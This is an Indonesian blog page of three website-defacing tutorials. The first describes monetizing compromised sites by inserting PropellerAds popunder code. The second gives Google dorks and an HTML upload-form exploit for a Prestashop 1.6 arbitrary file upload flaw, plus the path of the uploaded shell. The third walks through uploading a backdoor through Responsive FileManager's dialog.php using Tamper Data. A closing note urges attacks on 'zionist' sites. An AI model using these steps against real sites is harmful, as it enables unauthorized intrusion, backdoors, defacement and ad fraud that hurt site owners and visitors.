Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )


Kalian defacer ? Untuk apa kalian mendeface ? Alangkah baiknya kita menyelam sambil minum air , yaitu Mengais receh dari Defacing .
Bagaimana caranya ?

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )
BAHAN :


- Laptop/Komputer dengan Koneksi

- Web yang akan di Deface ( Usahakan sudah masuk ke Shell / cPanel web tsb )

- Kopinya jangan lupa :v

LANGKAH :



1) Saya anggap kalian sudah masuk ke shell / cPanel website yang akan di deface .

2) Masuk ke propellerads ( Saya anggap anda telah mendaftar sebagai Publisher di PropellerAds
atau yang lainnya seperti popcash dan popads , saya sarankan propellerads 
lalu daftarkan situs yang akan di deface .

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

3) Ambil kode verifikasi lalu tempatkan di web tersebut dibawah kode <head>

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

4) Kembali ke propellerads, buat unit iklan Popunder lalu get code


Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )
Free Script Deface Keren Disini

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

5) Pasang code tersebut di web yg akan dideface dibawah code <body> .

Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )


Mendapatkan Duit/Uang dari Pekerjaan Deface Website ( Defacer Berpenghasilan )

Selamat menikmati receh :) Saya sarankan tidak usah menebas suatu Web , lebih baik di pasang ads :)
Sekian,

Cara Deface Website dengan Responsive Prestashop 1.6 Arbitrary File Upload

Cara Deface Website dengan Responsive Prestashop 1.6 Arbitrary File Upload


Pada artikel yang satu ini , kami akan menjelaskan tentang " Cara deface website dengan Responsive Prestashop 1.6 Arbitrary File Upload " .
Disini menggunakan dua cara yaitu Manual dan Auto ( tools )

Berikut adalah langkah - langkah secara Manual :

#1 Dork :

- inurl:/modules/columnadverts/
- inurl:/modules/homepageadvertise/
- inurl:/modules/productpageadverts/
- inurl:/modules/simpleslideshow/
- inurl:/themes/warehouse/

untuk dork nya silahkan di kembangkan lagi.

#2  Jika Website yang anda pilih dari proses dorking tadi , apabila website tersebut memiliki celah / vuln maka akan muncul tampilan seperti ini :


#3 Apabila terdapat vuln , silahkan gunakan salah satu Exploit dan PoC di bawah ini :

- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php

Exploit Disini:
<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>


#4 Jika upload berhasil , akan muncul tampilan seperti ini :



#5 Selesai ...

Untuk mengakses Shell / backdoor yang telah di upload , silahkan gunakan yang di bawah ini :

     Target/modules/modul name/slides/shell.php


Jika anda masih bingung dengan cara manual seperti ini , anda bisa menggunakan Tools di "Auto Exploit Responsive Prestashop 1.6  Arbitrary File Upload " .

[YC]

Cara Deface Website Dengan Teknik Responsive FileManager

Cara Deface Website Dengan Teknik Responsive FileManager

Deface website atau mengganti tampilan atau isi dari website tersebut merupakan Hal yang sangat populer bagi para hacker , terutama yang baru belajar mengenai penetrasi web dan exploit .

Pada artikel kali ini, team DBT akan membagikan tutorial "Cara deface website dengan teknik Responsive Manager". Silahkan baca di bawah ini :


BAHAN : 

1. Dork : 

    1. inurl:/filemanager/ intext:”dialog.php”
    2. inurl:/js/filemanager/ intext:”dialog.php”
    3. inurl:/assets/filemanager/ intext:”dialog.php”



dork favorit admin = inurl:/assets/filemanager/ site:.com ( dork bisa anda kembangkan sendiri )


2. Exploit : /dialog.php

3. Tamper Data 

4. Shell / Backdoor

5. Script Deface anda

 Setelah semua bahan - bahan yang ada di atas telah lengkap , anda kemudian menuju ke tahap tutorial seperti di bawah ini.

Tutorial : 



#1. Buka Browser anda dan kemudian masuk ke google search engine .
Contoh kali ini saya menggunakan dork (inurl:/assets/filemanager/ site:.com)
Masukkan dork anda seperti gambar di bawah ini.
 


 

Silahkan anda memilih salah satu target yang telah muncul .

#2 . Setelah anda memilih salah satu target. Akan muncul tampilan baru seperti gambar di bawah ini.


exploit dari responsive filemanager

Pilih file yang bernama " dialog.php " tanpa tanda kutip . karna file tersebut merupakan exploit dari teknik responsive filemanager .

#3. Kemudian setelah anda mengklik file exploit dialog.php , kemudian akan muncul tampilan baru lagi seperti gambar di bawah ini :


Tekan tombol Upload atau yang berada di dalam lingkaran merah pada gambar di atas.

#4. Setelah itu , akan muncul tampilan baru lagi.
Tapi jangan buru - buru dulu , sebelum mengupload ikuti langkah yang ada pada gambar di bawah ini.


Apabila anda telah sampai pada tampilan yang ada diatas. silahkan Gunakan Tamper Data.

Pilih Alat >> Tamper Data >> Lalu anda klik START TAMPER seperti gambar di bawah ini .


#5. Setelah anda meng-klik Start tamper tadi , akan muncul form filemanager untuk mengupload file anda seperti yang ada pada gambar di bawah ini.


 Apabila telah muncul tampilan seperti di atas , upload file anda yang ber ekstensi .html
INGAT ! anda hanya bisa mengupload shell / backdoor yang ber ekstensi .html




Kemudian akan muncul form baru lagi seperti diatas , silahkan langsung klik tombol " tamper " seperti pada gambar .



Upload selesai ...

#6 Setelah sukses mengupload shell  , sekarang kita akan mengakses shell tersebut.
Caranya klik "Return to file list" seperti gambar di bawah ini.


kemudian kita cari shell / backdoor kita .
Klik kanan pada file shell yang telah kita upload tadi , kemudian pilih "Show URL"seperti gambar dibawah ini.


Nah setelah anda meng klik " Show URL " .  Maka akan muncul tampilan yang berisi link tempat dimana shell tersebut di upload, seperti gambar di bawah ini.


Salin URL tadi ke Address bar , dan akhirnya anda sudah masuk ke backdoor ...
Selamat ..






NB : Usahakan jangan menyerang situs dalam negeri sendiri , Gunakan untuk Membasmi kaum zionist .



[MBL]